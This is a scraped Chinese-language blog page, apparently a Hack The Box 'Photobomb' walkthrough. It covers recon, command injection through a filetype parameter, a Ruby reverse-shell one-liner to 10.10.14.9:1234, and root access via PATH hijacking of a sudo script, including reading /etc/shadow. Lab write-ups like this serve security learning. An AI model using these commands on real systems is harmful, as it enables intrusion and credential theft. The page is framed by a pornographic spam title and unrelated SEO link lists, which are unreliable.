中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

基金管理公司司網(wǎng)站建設(shè)要求百度推廣區(qū)域代理

基金管理公司司網(wǎng)站建設(shè)要求,百度推廣區(qū)域代理,商標(biāo)注冊網(wǎng)電子證書,滄州市網(wǎng)站建設(shè)電話HTB-Photobomb信息收集開機(jī)提權(quán)對于問題的思考信息收集 端口掃描 目標(biāo)首頁 有一個http Authorization 目錄掃描 在查看源碼的時候發(fā)現(xiàn)了一個js文件。 并且發(fā)現(xiàn)了訪問不存在的目錄會出現(xiàn)錯誤提示。 通過搜索得知 Sinatra 是一個基于 Ruby 語言的 DSL(領(lǐng)域…

在這里插入圖片描述

HTB-Photobomb

  • 信息收集
  • 開機(jī)
  • 提權(quán)
  • 對于問題的思考

信息收集

端口掃描
在這里插入圖片描述

目標(biāo)首頁
在這里插入圖片描述
有一個http Authorization

目錄掃描
在這里插入圖片描述
在這里插入圖片描述

在查看源碼的時候發(fā)現(xiàn)了一個js文件。
在這里插入圖片描述
在這里插入圖片描述
并且發(fā)現(xiàn)了訪問不存在的目錄會出現(xiàn)錯誤提示。
在這里插入圖片描述
通過搜索得知

Sinatra 是一個基于 Ruby 語言的 DSL(領(lǐng)域?qū)僬Z言),可以輕松、快速的創(chuàng)建 web 應(yīng)用。-------Sinatra 中文文檔

通過上面發(fā)現(xiàn)了http Authorization的登陸憑證pH0t0:b0Mb!,使用憑證登錄。
在這里插入圖片描述

登陸進(jìn)去沒有發(fā)現(xiàn)什么,決定開始第二次信息收集,沒錯,沒有額外收獲。對其下載功能使用bp,能看見三個參數(shù)。

在這里插入圖片描述
估計(jì)突破口在這三個參數(shù)當(dāng)中,誰知道呢,因?yàn)榍懊嬷繱inatra,所以首先考慮ruby,經(jīng)過簡單測試發(fā)現(xiàn)突破點(diǎn)應(yīng)在filetype,并且無法正確回彈。

開機(jī)

沒關(guān)系,至少證明我應(yīng)該找到方向了,但是為什么會回彈沒有完全成功。不會防火墻攔截了吧。更換了一個ruby的reshell腳本。

ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.9",1234))'

在這里插入圖片描述

提權(quán)

通過sudo -l能發(fā)現(xiàn)一個文件。
在這里插入圖片描述
文件內(nèi)容與下,最重要的應(yīng)該是最后一句。在source_images目錄里找到所有jpg文件并且給予root:root。
在這里插入圖片描述
立即想到的方法是通過這個腳本修改所屬者和組的權(quán)限,使用bash -p選項(xiàng)將root組添加至wizard用戶組。似乎不行。
在這里插入圖片描述

雖然在hacktrick上找到了可能能用的方法,但是我沒研究出來。在這里插入圖片描述
又出現(xiàn)問題了,大概率是用法不對。
在這里插入圖片描述

因?yàn)槟_本使用的find命令,注意這個find命令并不是絕對路徑。
在這里插入圖片描述
又因?yàn)橄到y(tǒng)環(huán)境變量PATH里面有/usr/bin,所以我們能夠直接用find調(diào)用/usr/bin/find。
在這里插入圖片描述
如果我對系統(tǒng)變量進(jìn)行修改,使之find為我們自己創(chuàng)建的一個同名文件。

在這里插入圖片描述
接著要做的就是把/tmp目錄添加到系統(tǒng)環(huán)境變量里。
在這里插入圖片描述

PATH=/tmp:$PATH

在這里插入圖片描述
然后執(zhí)行腳本發(fā)現(xiàn)沒有作用,為什么呢。
在這里插入圖片描述
然后嘗試以下方式能成功,這又是為什么。

在這里插入圖片描述

對于問題的思考

為了知道那兩個為什么,我做了個實(shí)驗(yàn)。tee.sh里面只有id命令,然后當(dāng)前目錄下有一個id同名文件,在修改系統(tǒng)環(huán)境變量命令后面加上要執(zhí)行的腳本,就會出現(xiàn)要執(zhí)行的腳本使用前面系統(tǒng)環(huán)境變量里面的id文件(也就是當(dāng)前目錄下的id)。

id內(nèi)容如下。

在這里插入圖片描述

tee.sh的內(nèi)容為。
在這里插入圖片描述
先分開運(yùn)行看看。能看到加入環(huán)境變量前后id的命令發(fā)生了改變,并且再用sudo會發(fā)現(xiàn)tee.sh文件內(nèi)的id是查看用戶(組)的命令,而不是cat /etc/shadow。
在這里插入圖片描述

這次加上合著一起用。可以看到使用sudo執(zhí)行了當(dāng)前目錄文件id的cat /etc/shadow。
在這里插入圖片描述

也就是說如果需要讓腳本內(nèi)的命令以某個路徑下的同名命令替換運(yùn)行并以sudo權(quán)限運(yùn)行的話就需要sudo PATH:somepath:$PATH somescript.sh。至于為什么,我覺得以我目前的水平只能認(rèn)為這可能是一種固定的使用方式,至于真的是否如此,只有等日后探究真相。

http://m.risenshineclean.com/news/61487.html

相關(guān)文章:

  • 做宣傳單用什么網(wǎng)站找圖片優(yōu)化培訓(xùn)方式
  • 修改wordpress代碼加快打開速度seo怎么做關(guān)鍵詞排名
  • 上海聯(lián)通 網(wǎng)站備案百度競價(jià)托管外包
  • 建設(shè)工程信息網(wǎng)官網(wǎng)首頁seo整合營銷
  • 網(wǎng)站建設(shè) 要維護(hù)么網(wǎng)絡(luò)推廣合同
  • 常德做網(wǎng)站專業(yè)公司百度信息流開戶多少錢
  • 農(nóng)業(yè)電商網(wǎng)站有哪些google chrome瀏覽器
  • 江蘇連云港網(wǎng)站制作公司輿情監(jiān)測分析系統(tǒng)
  • 做傳單的網(wǎng)站網(wǎng)站運(yùn)營培訓(xùn)學(xué)校
  • 品牌網(wǎng)站推廣寧波網(wǎng)站優(yōu)化公司推薦
  • 美國做ppt的網(wǎng)站怎么進(jìn)入百度推廣賬戶
  • 做美食類網(wǎng)站分析軟文營銷廣告
  • 旅游網(wǎng)站建設(shè)解決方案競價(jià)托管代運(yùn)營多少錢
  • 無為縣住房建設(shè)局網(wǎng)站首頁北京突發(fā)重大消息
  • 怎么看一個網(wǎng)站做沒做優(yōu)化開魯網(wǎng)站seo不用下載
  • 關(guān)于做網(wǎng)站電話銷售深圳排名seo
  • 服裝網(wǎng)站建設(shè)規(guī)劃方案佛山今日頭條
  • 房地產(chǎn)網(wǎng)站制作關(guān)聯(lián)詞有哪些三年級
  • 什么網(wǎng)站可以做實(shí)驗(yàn)室免費(fèi)源碼網(wǎng)站
  • 順德網(wǎng)站建設(shè)哪家好網(wǎng)頁設(shè)計(jì)學(xué)生作業(yè)模板
  • 網(wǎng)站建設(shè)能帶來流量么建站小程序
  • 有哪些網(wǎng)站免費(fèi)做推廣獨(dú)立站seo
  • 深圳網(wǎng)站制作公司興田德潤在哪里建立網(wǎng)站平臺
  • 介紹產(chǎn)品網(wǎng)站制作制作自己的網(wǎng)頁
  • 操作簡單網(wǎng)站搭建費(fèi)用網(wǎng)站免費(fèi)搭建平臺
  • wordpress手機(jī)號網(wǎng)站企業(yè)seo培訓(xùn)
  • 中國的網(wǎng)站域名新媒體營銷案例分析
  • 程序員做彩票網(wǎng)站違法嗎競價(jià)廣告推廣
  • php+開發(fā)動態(tài)網(wǎng)站開發(fā)百度推廣的四種收費(fèi)形式
  • 高端網(wǎng)站鑒賞哈爾濱百度搜索排名優(yōu)化